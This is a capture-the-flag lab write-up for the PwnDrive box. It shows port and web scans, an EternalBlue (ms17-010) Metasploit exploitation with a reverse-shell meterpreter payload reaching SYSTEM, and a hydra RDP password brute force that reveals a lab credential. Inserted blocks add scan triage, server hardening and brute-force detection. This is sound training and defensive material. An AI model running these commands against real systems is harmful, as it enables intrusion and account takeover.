Penetration Testing Foundations
PwnTillDawnAcademyIsAwesome!!!
nmap -sC -sV -sU 10.150.150.11 -p 137,161
PORT STATE SERVICE VERSION
137/udp open netbios-ns Microsoft Windows or Samba netbios-ns (workgroup: WORKGROUP)
161/udp closed snmp
Service Info: Host: PWNDRIVE
nmap -sC -sV 10.150.150.11
PORT STATE SERVICE VERSION
21/tcp open ftp Xlight ftpd 3.9
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.9)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.9
|_http-title: PwnDrive - Your Personal Online Storage
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.9)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.9
|_http-title: PwnDrive - Your Personal Online Storage
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Windows Server 2008 R2 Enterprise 7601 Service Pack 1 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2012 11.00.2100.00; RTM
| ms-sql-ntlm-info:
| Target_Name: PWNDRIVE
| NetBIOS_Domain_Name: PWNDRIVE
| NetBIOS_Computer_Name: PWNDRIVE
| DNS_Domain_Name: PwnDrive
| DNS_Computer_Name: PwnDrive
|_ Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-08-24T13:11:13
|_Not valid after: 2050-08-24T13:11:13
|_ssl-date: 2022-01-08T10:17:11+00:00; +47m25s from scanner time.
3306/tcp open mysql MySQL 5.5.5-10.4.14-MariaDB
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.4.14-MariaDB
| Thread ID: 1134
| Capabilities flags: 63486
| Some Capabilities: Speaks41ProtocolOld, ODBCClient, Speaks41ProtocolNew, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, FoundRows, SupportsCompression, LongColumnFlag, InteractiveClient, Support41Auth, ConnectWithDatabase, SupportsTransactions, SupportsLoadDataLocal, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: 'BXt]ToS04V5D5z-l[aX
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2022-01-08T10:17:10+00:00; +47m24s from scanner time.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h07m24s, deviation: 3h15m58s, median: 47m24s
| ms-sql-info:
| 10.150.150.11:1433:
| Version:
| name: Microsoft SQL Server 2012 RTM
| number: 11.00.2100.00
| Product: Microsoft SQL Server 2012
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_nbstat: NetBIOS name: PWNDRIVE, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:89:87:cb (VMware)
| smb-os-discovery:
| OS: Windows Server 2008 R2 Enterprise 7601 Service Pack 1 (Windows Server 2008 R2 Enterprise 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: PwnDrive
| NetBIOS computer name: PWNDRIVE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-01-08T02:17:00-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-01-08T10:17:00
|_ start_date: 2020-08-24T13:11:20
nmap --script "smb-vuln*" 10.150.150.11
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| <https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>
| <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>
|_ <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>
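The two nmap runs above already contain everything a defender needs to prioritise this host. As an added example (not part of the original write-up), the script below parses a constructed excerpt of that output and turns it into ranked findings: the session cookie without HttpOnly, the expired certificate, SMB signing disabled and the ms17-010 script reporting VULNERABLE; the scan date is taken from the ssl-date line.

```python
import re
from datetime import date, datetime

# Constructed excerpt of the nmap output shown above (not the full scan).
SAMPLE_SCAN = """\
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.9)
|_ httponly flag not set
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.9)
| ssl-cert: Subject: commonName=localhost
|_Not valid after: 2019-11-08T23:48:47
445/tcp open microsoft-ds Windows Server 2008 R2 Enterprise 7601 Service Pack 1 microsoft-ds
|_ message_signing: disabled (dangerous, but default)
| smb-vuln-ms17-010:
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
"""
SCAN_DATE = date(2022, 1, 8)  # from the ssl-date line of the scan

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")
VULN_RE = re.compile(r"^\|[_ ]*(smb-vuln-[\w-]+):")
CVE_RE = re.compile(r"CVE:(CVE-\d{4}-\d+)")
EXPIRY_RE = re.compile(r"Not valid after:\s*(\d{4}-\d{2}-\d{2})")

def triage(scan_text, scan_date):
    """Return (severity, message) tuples for the findings a defender must act on."""
    findings = []
    port = None     # port/proto of the most recent service line
    script = None   # NSE vuln script whose block we are currently inside
    for line in scan_text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, script = f"{m.group(1)}/{m.group(2)}", None
            continue
        m = VULN_RE.match(line)
        if m:
            script = m.group(1)
        if "httponly flag not set" in line:
            findings.append(("medium", f"{port}: session cookie lacks HttpOnly"))
        m = EXPIRY_RE.search(line)
        if m and datetime.strptime(m.group(1), "%Y-%m-%d").date() < scan_date:
            findings.append(("low", f"{port}: TLS certificate expired {m.group(1)}"))
        if "message_signing: disabled" in line:
            findings.append(("high", f"{port}: SMB message signing disabled (relay risk)"))
        if "State: VULNERABLE" in line and script:
            findings.append(("critical", f"{port}: {script} reports VULNERABLE"))
        m = CVE_RE.search(line)
        if m and findings and script and script in findings[-1][1]:
            sev, msg = findings[-1]        # attach the CVE id to the vuln finding
            findings[-1] = (sev, f"{msg} ({m.group(1)})")
    return findings
```

Run it against a full `nmap -sC -sV` text file to get the same ranked list for any host; the ms17-010 line is the one that warrants patching before anything else.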
nikto -host 10.150.150.11
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.150.150.11
+ Target Hostname: 10.150.150.11
+ Target Port: 80
+ Start Time: 2022-01-08 09:42:29 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.9
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/7.4.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See <http://www.wisec.it/sectou.php?id=4698ebdc59d15>. The following alternatives for 'index' were found: HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var, HTTP_NOT_FOUND.html.var
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /Admin/: Directory indexing found.
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /Admin/: This might be interesting...
+ /login.php: Admin login page/section found.
+ 8703 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time: 2022-01-08 10:58:19 (GMT-5) (4550 seconds)
---------------------------------------------------------------------------
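Every nikto item above maps to one Apache or PHP setting. The fragment below is an added example, not the target's configuration: it lists the permissive settings the findings imply and the hardened equivalents (assumes mod_headers is loaded; the DocumentRoot path is a placeholder).

```apache
# Permissive settings implied by the nikto findings above (do not use):
#   Options Indexes MultiViews   -> "Directory indexing found", MultiViews file-name guessing
#   TraceEnable On               -> "HTTP TRACE method is active" (XST)
#   ServerTokens Full            -> full Apache/OpenSSL/PHP versions in the Server banner
#   no Header directives         -> X-Frame-Options / X-Content-Type-Options missing

# Hardened equivalent for httpd.conf
ServerTokens Prod
ServerSignature Off
TraceEnable Off

# Placeholder DocumentRoot; use the real one
<Directory "C:/path/to/htdocs">
    Options -Indexes -MultiViews
    AllowOverride None
    Require all granted
</Directory>

# config.php is loaded by PHP from disk; it never needs to be served over HTTP
<Files "config.php">
    Require all denied
</Files>

Header always set X-Frame-Options "SAMEORIGIN"
Header always set X-Content-Type-Options "nosniff"
Header always set Content-Security-Policy "default-src 'self'; frame-ancestors 'self'"
# The legacy filter nikto asks for is disabled on purpose; the CSP above does the real work
Header always set X-XSS-Protection "0"
Header always unset X-Powered-By

# Matching php.ini settings (PHP 7.4 per the banner):
#   expose_php = Off              ; drops the X-Powered-By header
#   session.cookie_httponly = 1   ; fixes the PHPSESSID finding
#   session.cookie_secure = 1     ; session cookie only over the 443 listener
```

Re-run nikto after restarting Apache; the remaining `/admin/` and `/login.php` items are application structure, not configuration, and need an access control review rather than a directive.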
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost tun0
lhost => tun0
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.150.150.11
rhost => 10.150.150.11
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[*] 10.150.150.11:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.150.150.11:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 10.150.150.11:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.150.150.11:445 - The target is vulnerable.
meterpreter > sysinfo
Computer : PWNDRIVE
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\Windows\system32
Change directory out of system32 before listing: the ls
command hangs when a directory contains too many files.
The root flag is at C:\Users\Administrator\Desktop
meterpreter > cat FLAG1.txt
PwnTillDawnAcademyIsAwesome!!!
hydra -l tony -P /usr/share/wordlists/rockyou.txt.gz rdp://10.150.150.11
Hydra (<https://github.com/vanhauser-thc/thc-hydra>) starting at 2022-01-08 09:21:24
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking rdp://10.150.150.11:3389/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ERROR] freerdp: The connection failed to establish.
[VERBOSE] Retrying connection for child 1
[STATUS] 67.00 tries/min, 67 tries in 00:01h, 14344332 to do in 3568:15h, 4 active
**[3389][rdp] host: 10.150.150.11 login: tony password: blink182**
[STATUS] attack finished for 10.150.150.11 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (<https://github.com/vanhauser-thc/thc-hydra>) finished at 2022-01-08 09:24:20
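The hydra run above produces roughly one failed logon per second from a single source, then one success. As an added example (not part of the original write-up), the detector below runs that pattern over a constructed Windows Security log excerpt (events 4625 and 4624); the source address, timestamps and the assumption that RDP attempts appear with logon type 10, or 3 when NLA rejects the credential, are mine.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

def _ev(sec, event_id, user, src, logon_type=10):
    # Constructed event in the shape of a Windows Security log record.
    return {"time": datetime(2022, 1, 8, 9, 22, sec), "id": event_id,
            "user": user, "src": src, "type": logon_type}

# Eight failures a second apart from one client, one typo from another user,
# then a success from the first client (constructed, not taken from the target).
SAMPLE_EVENTS = [_ev(s, 4625, "tony", "10.66.66.5") for s in range(8)] + [
    _ev(3, 4625, "alice", "10.66.66.9", 3),
    _ev(9, 4624, "tony", "10.66.66.5"),
]

RDP_LOGON_TYPES = (3, 10)  # 10 = RemoteInteractive; 3 = NLA-rejected attempts (assumption)

def detect_rdp_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Alert on >= threshold failed logons from one source inside `window`,
    and escalate when that source then logs on successfully."""
    events = sorted(events, key=lambda e: e["time"])
    recent = defaultdict(deque)   # src -> timestamps of failures still inside the window
    flagged = set()
    alerts = []
    for e in events:
        if e["type"] not in RDP_LOGON_TYPES:
            continue
        q = recent[e["src"]]
        while q and e["time"] - q[0] > window:
            q.popleft()               # expire failures older than the window
        if e["id"] == 4625:
            q.append(e["time"])
            if len(q) >= threshold and e["src"] not in flagged:
                flagged.add(e["src"])
                alerts.append(("bruteforce", e["src"], e["user"], len(q)))
        elif e["id"] == 4624 and e["src"] in flagged:
            alerts.append(("success-after-bruteforce", e["src"], e["user"], len(q)))
    return alerts
```

The second alert is the one to page on: a success from a source that just failed repeatedly is the signature of the valid password hydra reports above, and account lockout or NLA plus MFA on the RDP listener stops the burst before it gets there.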